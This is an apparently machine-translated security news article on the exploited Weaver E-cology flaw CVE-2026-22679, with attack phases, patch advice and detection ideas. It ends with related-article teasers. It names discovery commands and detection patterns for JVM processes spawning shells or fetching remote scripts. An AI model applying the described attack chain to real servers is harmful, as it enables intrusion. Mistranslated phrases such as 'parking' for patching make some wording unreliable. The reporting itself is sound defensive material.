A critical failure in the Weaver Eco-cology office automation platform (identified as CVE-2026-22679) has been actively exploited since mid-March to execute discovery commands on compromised servers, according to the follow-up published by the Vega intelligence firm. The root of the problem is a debugging endpoint exposed that passes unvalidated parameters to the backend RPC functionality, which allows to convert that interface into a remote system-level command execution mechanism.
The panorama that Vega describes reveals several phases of attack: initial remote execution checks (by pings to callbacks associated with the Goby tool), attempts to download payloads by PowerShell osfuscado, the failed deployment of a directed MSI installer (fanwei0324.msi) and return to phileless techniques that repeatedly brought and executed remote scripts. Although in documented cases the endpoints defenses intervened and no established persistence was reached, the technical capacity to run commands such as whoami, ipconfig or tasklist from Java processes without authentication makes operational risk evident.
A critical data of the chronology: the attacks began a few days after the supplier published an update (build 20260312) and before the vulnerability was widely made public, which highlights two lessons: first, that the published updates are useless if not quickly applied; and second, that the availability of a patch does not prevent actors from looking for hosts without parking by taking advantage of prior technical information or the exposure surface itself.
The supplier removed the treatment endpoint in the grinding building, and the official recommendation is clear: update to the corrected version as soon as possible. You can find the patch and the manufacturer's bulletin on the Weaver page: Weaver safety notice (build 20260312). The technical analysis and timeline published by researchers is available in Vega's report: Vega analysis of CVE-2026-22679. For a priority framework and practices for responding to actively exploited vulnerabilities, see the CISA catalogue of exploited vulnerabilities: CISA KEV.
If your organization uses Weaver E-cology 10.0 or versions prior to 12 March 2026, the first mandatory action is to check the inventory and apply the correct build immediately. Beyond the patch, it is essential to validate that the update was applied correctly and to look for compromise indicators: review web server logs for applications to the old debugging endpoint, search for suspicious parameters in RPC requests, and events where java.exe processes act as cmd.exe parents, powershell.exe or other unexpected processes.
Practical detections should include the search for obfuscated PowerShell command lines, repeated calls to external domains or beacons DNS / TCP and devices related to the reported malicious installer (e.g. fanwei0324.msi references). In EDR environments, create rules to warn about child processes from the server's JVM (embedded Tomcat) that run system tools or that download and run scripts from remote locations.
From an architectural point of view, this vulnerability is a call for attention to implement preventive controls: restrict or remove endpoints of purification in production, apply the principle of less privilege to accounts and processes, segment networks to limit lateral movement capacity and subject critical endpoints to implementation control and output filtering policies. If it is not possible to park immediately, mitigate exposure by restricting access to the port or vulnerable endpoint through access control lists, reverse proxies or WAF, although the final correction should be the official update.
Finally, if you detect signs of exploitation or have reason to believe that a host was reached, activate the incident response plan: contain the affected system, preserve logs and memory for forensic analysis, assess the possibility of complete remediation (re-installation if contamination exists), and communicate to interested parties according to applicable regulations. The absence of persistence in documented cases does not guarantee that future attackers do not try to consolidate access; therefore, continuous monitoring and proactive search in the server park are essential.
18-year-old Ukrainian youth leads a network of infostealers that violated 28,000 accounts and left $250,000 in losses
The Ukrainian authorities, in coordination with US agents. They have focused on an operation of infostealer which, according to the Ukrainian Cyber Police, was allegedly adminis...
RAMPART and Clarity redefine the safety of IA agents with reproducible testing and governance from the start
Microsoft has presented two open source tools, RAMPART and Clarity, aimed at changing the way the safety of IA agents is tested: one that automates and standardizes technical te...
The digital signature is in check: Microsoft dismands a service that turned malware into apparently legitimate software
Microsoft announced the disarticulation of a "malware-signing-as-a-service" operation that exploited its device signature system to convert malicious code into seemingly legitim...
A single GitHub workflow token opened the door to the software supply chain
A single GitHub workflow token failed in the rotation and opened the door. This is the central conclusion of the incident in Grafana Labs following the recent wave of malicious ...
WebWorm 2025: the malware that is hidden in Discord and Microsoft Graphh to evade detection
The latest observations by cyber security researchers point to a change in worrying tactics of an actor linked to China known as WebWorm: in 2025 it has incorporated back doors ...
Identity is no longer enough: continuous verification of the device for real-time security
Identity remains the backbone of many security architectures, but today that column is cracking under new pressures: advanced phishing, real-time proxyan authentication kits and...
The dark matter of identity is changing the rules of corporate security
The Identity Gap: Snapshot 2026 report published by Orchid Security puts numbers to a dangerous trend: the "dark matter" of identity - accounts and credentials that are neither ...